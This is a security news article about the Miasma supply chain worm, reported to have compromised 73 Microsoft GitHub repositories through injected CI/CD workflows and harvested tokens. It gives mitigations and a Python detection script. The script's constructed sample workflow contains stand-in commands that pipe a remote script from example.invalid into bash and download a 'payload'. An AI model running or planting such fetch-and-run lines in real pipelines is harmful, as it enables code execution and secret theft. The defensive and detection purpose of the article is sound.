The Miasma self-replicating supply chain attack campaign has claimed its largest target yet: 73 Microsoft GitHub repositories spanning four of the company's primary GitHub organizations. The incident, reported by OpenS (a supply chain security firm) and covered by The Hacker News, represents a significant escalation in the scope of an attack pattern that has been spreading through the open-source ecosystem for weeks.
What Is Miasma?
Miasma is a self-replicating supply chain worm designed to propagate through GitHub and package registry ecosystems. Unlike targeted attacks that require manual operator intervention at each step, Miasma automates its spread by:
- Gaining access to a repository with write permissions (typically via a stolen or compromised token)
- Injecting malicious CI/CD workflow modifications or package manifest changes
- Using the newly compromised repository's secrets and tokens to propagate to connected repositories and package registries
- Establishing persistent credential-stealing payloads that continue to harvest tokens over time
The worm's self-replicating nature means that once it gains a foothold in a connected ecosystem, its blast radius expands without additional attacker intervention.
The Microsoft Incident
According to the report, Miasma successfully compromised 73 repositories across four Microsoft GitHub organizations:
| Organization | Nature of Repositories |
|---|---|
| Azure | Core Azure platform SDKs and tooling |
| Azure-Samples | Sample applications and quickstarts |
| Microsoft | Cross-product repositories |
| MicrosoftDocs | Documentation and content repositories |
The repositories affected span a range of criticality. While MicrosoftDocs repositories primarily contain documentation content, Azure and Azure-Samples repositories can include SDK code, deployment templates, and infrastructure-as-code that downstream developers pull directly into their projects.
How It Spread to Microsoft
The attack path that allowed Miasma to reach Microsoft's repositories follows the same pattern seen in earlier campaign stages. The worm previously compromised repositories in the open-source ecosystem — including packages like TanStack (a widely used React data-fetching library) — and harvested CI/CD tokens that had cross-repository or cross-organization write access.
Developers at large organizations routinely work across personal, open-source, and company repositories using shared credentials or personal access tokens. When a token with broad write scope is present in a compromised repository's secrets, Miasma can use it to extend its reach into the associated organization's other repositories.
Scope and Impact Assessment
Microsoft's security team and GitHub's security organization confirmed the incident and have been working to contain the spread. Key details:
- 73 repositories confirmed compromised across four organizations
- Malicious workflow modifications were the primary injection mechanism
- Token harvesting payloads were introduced to harvest secrets from future CI/CD runs
- Microsoft confirmed that customer data was unaffected in initial statements, though investigations are ongoing for any downstream impact on consumers of the affected packages or documentation
The Azure-Samples organization warrants particular attention. Sample code repositories are often used directly by developers bootstrapping new projects. If malicious code persists in sample repositories before detection and remediation, it can propagate into production systems far removed from the original compromise.
Broader Campaign Context
This Microsoft incident is part of a sustained and expanding campaign. The Miasma worm has previously been linked to attacks on:
- TanStack (npm packages used by OpenAI employees, forcing macOS security updates)
- Grafana (source code exfiltration via stolen GitHub tokens)
- Checkmarx supply chain tooling
- Numerous npm, PyPI, and RubyGems packages across the broader open-source ecosystem
The campaign has demonstrated a sophisticated understanding of how development environments interconnect — particularly the trust relationships between personal GitHub accounts, organizational repositories, and CI/CD pipelines.
Mitigations and Recommended Actions
For organizations using Microsoft's affected GitHub repositories:
Immediate Actions
- Audit your CI/CD pipeline for any workflows that pull from the affected Microsoft organizations (Azure, Azure-Samples, Microsoft, MicrosoftDocs). Pin workflow references to specific commit SHAs rather than branch names or tags.
- Review your GitHub token permissions — rotate any tokens that have write access to multiple organizations, and scope tokens to the minimum required permissions.
- Check for unexpected workflow changes in your own repositories. Miasma's signature includes modifications to .github/workflows/ YAML files.
Medium-Term Hardening
- Implement required reviews for workflow changes via GitHub branch protection rules.
- Enable secret scanning and push protection on all repositories to block accidental token exposure.
- Adopt a token rotation policy — long-lived tokens with broad scope are a primary attack vector for supply chain worms like Miasma.
- Use GitHub's dependency graph and Dependabot alerts to identify direct dependencies on affected packages.
For Enterprise Teams
Organizations with Azure deployments or developer toolchains built on Azure SDKs should:
- Cross-reference their dependency trees against the list of 73 affected repositories once Microsoft publishes the full disclosure
- Audit recently pulled or cached versions of Azure SDK packages in internal artifact registries
- Monitor for unexpected outbound connections or token usage in build pipelines
Detection Indicators
Security teams monitoring for Miasma-related activity should look for:
- Unexpected modifications to .github/workflows/ files, particularly additions of curl or wget calls to external endpoints
- New or modified package.json, requirements.txt, or go.mod files adding unfamiliar dependencies
- GitHub Actions logs showing unexpected token usage or cross-repository API calls
- Outbound HTTPS connections from CI runners to domains not previously seen in your baseline
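As an added example (not code from the OpenS report, Microsoft, or GitHub), the following Python script applies two of the checks described above to a constructed workflow file: it flags uses: references that are not pinned to a full commit SHA, as the Immediate Actions section recommends, and reports curl or wget downloads from hosts outside an allowlist, as the Detection Indicators section describes. The sample workflow, the example.invalid host, and the 40-character SHA are constructed placeholders.

```python
import re

# Constructed sample workflow: not from the page, OpenS or any real repository.
# The SHA and the example.invalid host are placeholders.
SAMPLE_WORKFLOW = """\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@8f152de45cc7d2f4a5b2a2d9c6b8c5d1e1f2a3b4
      - run: npm ci
      - run: |
          curl -fsSL https://example.invalid/setup.sh | bash
      - run: wget -qO /tmp/p https://example.invalid/payload
"""

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*(\S+)")
FETCH_RE = re.compile(r"""\b(curl|wget)\b.*?(https?://[^\s|'"]+)""")

def find_unpinned_actions(text):
    """Return (action, ref) for every uses: line not pinned to a full 40-hex commit SHA."""
    # Tags and branches (v4, main) are mutable and can be repointed by whoever controls the action repo.
    findings = []
    for line in text.splitlines():
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local and container actions carry no git ref to pin
        action, _, version = ref.partition("@")
        if not SHA_RE.match(version):
            findings.append((action, version))
    return findings

def find_external_fetches(text, allowed_hosts=()):
    """Return (tool, url) for curl/wget downloads whose host is not in allowed_hosts."""
    # Every line is scanned, so commands inside multi-line `run: |` blocks are covered too.
    findings = []
    for line in text.splitlines():
        for tool, url in FETCH_RE.findall(line):
            host = re.sub(r"^https?://", "", url).split("/")[0]
            if host not in allowed_hosts:
                findings.append((tool, url))
    return findings
```

Running both functions over each workflow in a repository before and after a suspicious commit, and diffing the results, turns the "unexpected modification" indicator above into a concrete alert.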